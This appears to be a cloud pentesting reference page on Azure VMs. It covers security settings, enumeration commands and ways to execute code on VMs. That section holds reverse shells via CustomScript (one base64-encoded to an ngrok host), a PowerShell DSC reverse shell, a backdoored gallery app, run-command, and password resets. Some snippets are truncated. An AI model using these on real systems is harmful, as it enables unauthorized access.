Az - Virtual Machines & Network

Reading time: 25 minutes


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Azure Networking Basic Info

Azure networks contains different entities and ways to configure it. You can find a brief descriptions, examples and enumeration commands of the different Azure network entities in:

Az - Azure Network

VMs Basic information

Azure Virtual Machines (VMs) are flexible, on-demand cloud-based servers that let you run Windows or Linux operating systems. They allow you to deploy applications and workloads without managing physical hardware. Azure VMs can be configured with various CPU, memory, and storage options to meet specific needs and integrate with Azure services like virtual networks, storage, and security tools.

Security Configurations

  • Availability Zones: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
  • Security Type:
    • Standard Security: This is the default security type that does not require any specific configuration.
    • Trusted Launch: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
    • Confidential VMs: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and more.
  • Authentication: By default a new SSH key is generated, although it's possible to use a public key or use a previous key and the username by default is azureuser. It's also possible to configure to use a password.
  • VM disk encryption: The disk is encrypted at rest by default using a platform managed key.
    • It's also possible to enable Encryption at host, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service (docs).
  • NIC network security group:
    • None: Basically opens every port
    • Basic: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
    • Advanced: Select a security group
  • Backup: It's possible to enable Standard backup (one a day) and Enhanced (multiple per day)
  • Patch orchestration options: This enable to automatically apply patches in the VMs according to the selected policy as described in the docs.
  • Alerts: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
    • Percentage CPU is greater than 80%
    • Available Memory Bytes is less than 1GB
    • Data Disks IOPS Consumed Percentage is greater than 95%
    • OS IOPS Consumed Percentage is greater than 95%
    • Network in Total is greater than 500GB
    • Network Out Total is greater than 200GB
    • VmAvailabilityMetric is less than 1
  • Heath monitor: By default check protocol HTTP in port 80
  • Locks: It allows to lock a VM so it can only be read (ReadOnly lock) or it can be read and updated but not deleted (CanNotDelete lock).
    • Most VM related resources also support locks like disks, snapshots...
    • Locks can also be applied at resource group and subscription levels

Disks & snapshots

  • It's possible to enable to attach a disk to 2 or more VMs
  • By default every disk is encrypted with a platform key.
    • Same in snapshots
  • By default it's possible to share the disk from all networks, but it can also be restricted to only certain private access or to completely disable public and private access.
    • Same in snapshots
  • It's possible to generate a SAS URI (of max 60days) to export the disk, which can be configured to require authentication or not
    • Same in snapshots
# List all disks
az disk list --output table

# Get info about a disk
az disk show --name <disk-name> --resource-group <rsc-group>

A VM image is a template that contains the operating system, application settings and filesystem needed to create a new virtual machine (VM). The difference between an image and a disk snapshot is that a disk snapshot is a read-only, point-in-time copy of a single managed disk, used primarily for backup or troubleshooting, while an image can contain multiple disks and is designed to serve as a template for creating new VMs.
Images can be managed in the Images section of Azure or inside Azure compute galleries which allows to generate versions and share the image cross-tenant of even make it public.

A restore point stores the VM configuration and point-in-time application-consistent snapshots of all the managed disks attached to the VM. It's related to the VM and its purpose is to be able to restore that VM to how it was in that specific point in it.

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shaerd with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

Azure Site Recovery

From the docs: Site Recovery helps ensure business continuity by keeping business apps and workloads running during outages. Site Recovery replicates workloads running on physical and virtual machines (VMs) from a primary site to a secondary location. When an outage occurs at your primary site, you fail over to a secondary location, and access apps from there. After the primary location is running again, you can fail back to it.

Azure Bastion

Azure Bastion enables secure and seamless Remote Desktop Protocol (RDP) and Secure Shell (SSH) access to your virtual machines (VMs) directly through the Azure Portal or via a jump box. By eliminating the need for public IP addresses on your VMs.

The Bastion deploys a subnet called AzureBastionSubnet with a /26 netmask in the VNet it needs to work on. Then, it allows to connect to internal VMs through the browser using RDP and SSH avoiding exposing ports of the VMs to the Internet. It can also work as a jump host.

To list all Azure Bastion Hosts in your subscription and connect to VMs through them, you can use the following commands:

# List bastions
az network bastion list -o table

# Connect via SSH through bastion
az network bastion ssh \
  --name MyBastion \
  --resource-group MyResourceGroup \
  --target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
  --auth-type ssh-key \
  --username azureuser \
  --ssh-key ~/.ssh/id_rsa

# Connect via RDP through bastion
az network bastion rdp \
  --name <BASTION_NAME> \
  --resource-group <RESOURCE_GROUP> \
  --target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
  --auth-type password \
  --username <VM_USERNAME> \
  --password <VM_PASSWORD>


The Azure Instance Metadata Service (IMDS) provides information about running virtual machine instances to assist with their management and configuration. It offers details such as the SKU, storage, network configurations, and information about upcoming maintenance events via REST API available at the non-routable IP address, which is accessible only from within the VM. Communication between the VM and IMDS stays within the host, ensuring secure access. When querying IMDS, HTTP clients inside the VM should bypass web proxies to ensure proper communication.

Moreover, to contact the metadata endpoint, the HTTP request must have the header Metadata: true and must not have the header X-Forwarded-For.

Check how to enumerate it in:

Cloud SSRF - HackTricks

VM Enumeration

# VMs
## List all VMs and get info about one
az vm list --output table
az vm show --name <came> --resource-group <rsc-group>

## List all available VM images and get info about one
az vm image list --all --output table

# VM Extensions
## List all VM extensions
az vm extension image list --output table

## Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

## List extensions in a VM
az vm extension list -g <rsc-group> --vm-name <vm-name>

## List managed identities in a VM
az vm identity show \
  --resource-group <rsc-group> \
  --name <vm-name>

# Disks
## List all disks and get info about one
az disk list --output table
az disk show --name <disk-name> --resource-group <rsc-group>

# Snapshots
## List all galleries abd get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all snapshots and get info about one
az snapshot list --output table
az snapshot show --name <name> --resource-group <rsc-group>

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shared with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

# Bastion
## list all bastions
az network bastion list -o table

# Network
## List VNets
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"

## List subnets of a VNet
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table

## List public IPs
az network public-ip list --output table

## Get NSG rules
az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table

## Get NICs and subnets using this NSG
az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"

## List all Nics & get info of a single one
az network nic list --output table
az network nic show --name <name> --resource-group <rsc-group>

## List Azure Firewalls
az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table

## Get network rules of a firewall
az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get application rules of a firewall
az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get nat rules of a firewall
az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## List Route Tables
az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table

## List routes for a table
az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table

# Misc
## List all virtual machine scale sets
az vmss list --output table

## List all availability sets
az vm availability-set list --output table

## List all load balancers
az network lb list --output table

## List all storage accounts
az storage account list --output table

## List all custom script extensions on a specific VM
az vm extension list --vm-name <vm-name> --resource-group <resource-group>

# Show boot diagnostics settings for a specific VM
az vm boot-diagnostics get-boot-log --name <vm-name> --resource-group <resource-group>

## List all tags on virtual machines
az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[].{Name:name, Tags:tags}" --output table

# List all available run commands for virtual machines
az vm run-command list --output table
# Get readable VMs
Get-AzVM | fl
# Lis running VMs
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | fl *
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | select -ExpandProperty NetworkProfile

# Get iface and IP address
Get-AzNetworkInterface -Name <interface_name>
Get-AzPublicIpAddress -Name <iface_public_ip_id>

#Get installed extensions
Get-AzVMExtension -ResourceGroupName <res_group_name> -VMName <name>

Get-AzVM | select -ExpandProperty NetworkProfile # Get name of network connector of VM
Get-AzNetworkInterface -Name <name> # Get info of network connector (like IP)

# Disks
## List all disks and get info about one
Get-AzDisk -Name <DiskName> -ResourceGroupName <ResourceGroupName>

# Snapshots
## List all galleries abd get info about one
Get-AzGallery -Name <GalleryName> -ResourceGroupName <ResourceGroupName>

## List all snapshots and get info about one
Get-AzSnapshot -Name <SnapshotName> -ResourceGroupName <ResourceGroupName>

## List all image definitions in a gallery and get info about one
Get-AzGalleryImageDefinition -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>
Get-AzGalleryImageDefinition -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName> -Name <ImageDefinitionName>

## List all the versions of an image definition in a gallery
Get-AzGalleryImageVersion -GalleryImageDefinitionName <ImageName> -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>

## List all VM applications inside a gallery
Get-AzGalleryApplication -GalleryName <GalleryName> -ResourceGroupName <ResourceGroupName>

# Images
# List all managed images in your subscription
Get-AzImage -Name <ResourceName> -ResourceGroupName <ResourceGroupName>

# Restore points
## List all restore points and get info about 1
Get-AzRestorePointCollection -Name <CollectionName> -ResourceGroupName <ResourceGroupName>

# Bastion
## List bastions

# Network
## List all VNets in your subscription

## List VNet peering connections for a given VNet
(Get-AzVirtualNetwork -ResourceGroupName <ResourceGroupName> -Name <VNetName>).VirtualNetworkPeerings

## List Shared Resources (e.g., Azure Firewall) in the Hub

## List VPN Gateways
Get-AzVirtualNetworkGateway -ResourceGroupName <ResourceGroupName>

## List VPN Connections
Get-AzVirtualNetworkGatewayConnection -ResourceGroupName <ResourceGroupName>

## List ExpressRoute Circuits

# Misc
## List all virtual machine scale sets

## List all availability sets

## List all load balancers

## List all storage accounts

## List all custom script extensions on a specific VM
Get-AzVMExtension -VMName <VmName> -ResourceGroupName <ResourceGroupName>

Code Execution in VMs

VM Extensions

Azure VM extensions are small applications that provide post-deployment configuration and automation tasks on Azure virtual machines (VMs).

This would allow to execute arbitrary code inside VMs.

The required permission is Microsoft.Compute/virtualMachines/extensions/write.

It's possible to list all the available extensions with:

# It takes some mins to run
az vm extension image list --output table

# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

It's possible to run custom extensions that runs custom code:

  • Execute a revers shell
# Prepare the rev shell
echo -n 'bash -i  >& /dev/tcp/ 0>&1' | base64

# Execute rev shell
az vm extension set \
  --resource-group <rsc-group> \
  --vm-name <vm-name> \
  --name CustomScript \
  --publisher Microsoft.Azure.Extensions \
  --version 2.1 \
  --settings '{}' \
  --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
  • Execute a script located on the internet
az vm extension set \
  --resource-group rsc-group> \
  --vm-name <vm-name> \
  --name CustomScript \
  --publisher Microsoft.Azure.Extensions \
  --version 2.1 \
  --settings '{"fileUris": [""]}' \
  --protected-settings '{"commandToExecute": "sh"}'

Relevant VM extensions

The required permission is still Microsoft.Compute/virtualMachines/extensions/write.

VMAccess extension

This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.

# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
DesiredStateConfiguration (DSC)

This is a VM extension that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to execute arbitrary commands in Windows VMs through this extension:

# Content of revShell.ps1
Configuration RevShellConfig {
    Node localhost {
        Script ReverseShell {
            GetScript = { @{} }
            SetScript = {
                $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
                $stream = $client.GetStream();
                [byte[]]$bytes = 0..65535|%{0};
                while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
                    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
                    $sendback = (iex $data 2>&1 | Out-String );
                    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
                    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
                    $stream.Write($sendbyte, 0, $sendbyte.Length)
            TestScript = { return $false }
RevShellConfig -OutputPath .\Output

# Upload config to blob
$resourceGroup = 'dscVmDemo'
$storageName = 'demostorage'
Publish-AzVMDscConfiguration `
    -ConfigurationPath .\revShell.ps1 `
    -ResourceGroupName $resourceGroup `
    -StorageAccountName $storageName `

# Apply DSC to VM and execute rev shell
$vmName = 'myVM'
Set-AzVMDscExtension `
    -Version '2.76' `
    -ResourceGroupName $resourceGroup `
    -VMName $vmName `
    -ArchiveStorageAccountName $storageName `
    -ArchiveBlobName '' `
    -AutoUpdate `
    -ConfigurationName 'RevShellConfig'
Hybrid Runbook Worker

This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the Automation Accounts service.

VM Applications

These are packages with all the application data and install and uninstall scripts that can be used to easily add and remove application in VMs.

# List all galleries in resource group
az sig list --resource-group <res-group> --output table

# List all apps in a fallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

These are the paths were the applications get downloaded inside the file system:

  • Linux: /var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>
  • Windows: C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>

Check how to install new applications in


It's possible to share individual apps and galleries with other subscriptions or tenants. Which is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.

But there isn't a "marketplace" for vm apps like there is for extensions.

The permissions required are:

  • Microsoft.Compute/galleries/applications/write
  • Microsoft.Compute/galleries/applications/versions/write
  • Microsoft.Compute/virtualMachines/write
  • Microsoft.Network/networkInterfaces/join/action
  • Microsoft.Compute/disks/write

Exploitation example to execute arbitrary commands:

# Create gallery (if the isn't any)
az sig create --resource-group myResourceGroup \
   --gallery-name myGallery --location "West US 2"

# Create application container
az sig gallery-application create \
    --application-name myReverseShellApp \
    --gallery-name myGallery \
    --resource-group <rsc-group> \
    --os-type Linux \
    --location "West US 2"

# Create app version with the rev shell
## In Package file link just add any link to a blobl storage file
az sig gallery-application version create \
   --version-name 1.0.2 \
   --application-name myReverseShellApp \
   --gallery-name myGallery \
   --location "West US 2" \
   --resource-group <rsc-group> \
   --package-file-link "" \
   --install-command "bash -c 'bash -i >& /dev/tcp/ 0>&1'" \
   --remove-command "bash -c 'bash -i >& /dev/tcp/ 0>&1'" \
   --update-command "bash -c 'bash -i >& /dev/tcp/ 0>&1'"

# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
   --resource-group <rsc-group> \
   --name <vm-name> \
   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
   --treat-deployment-as-failure true

User data

This is persistent data that can be retrieved from the metadata endpoint at any time. Note in Azure user data is different from AWS and GCP because if you place a script here it's not executed by default.

Custom data

It's possible to pass some data to the VM that will be stored in expected paths:

  • In Windows custom data is placed in %SYSTEMDRIVE%\AzureData\CustomData.bin as a binary file and it isn't processed.
  • In Linux it was stored in /var/lib/waagent/ovf-env.xml and now it's stored in /var/lib/waagent/CustomData/ovf-env.xml
    • Linux agent: It doesn't process custom data by default, a custom image with the data enabled is needed
    • cloud-init: By default it processes custom data and this data may be in several formats. It could execute a script easily sending just the script in the custom data.
      • I tried that both Ubuntu and Debian execute the script you put here.
      • It's also not needed to enable user data for this to be executed.
echo "Hello World" > /var/tmp/output.txt

Run Command

This is the most basic mechanism Azure provides to execute arbitrary commands in VMs. The needed permission is Microsoft.Compute/virtualMachines/runCommand/action.

# Execute rev shell
az vm run-command invoke \
  --resource-group <rsc-group> \
  --name <vm-name> \
  --command-id RunShellScript \

# file content
echo "bash -c 'bash -i >& /dev/tcp/ 0>&1'" >

Privilege Escalation

Az - Virtual Machines & Network Privesc

Unauthenticated Access

Az - VMs Unath

Post Exploitation

Az - VMs & Network Post Exploitation


Az - VMs Persistence



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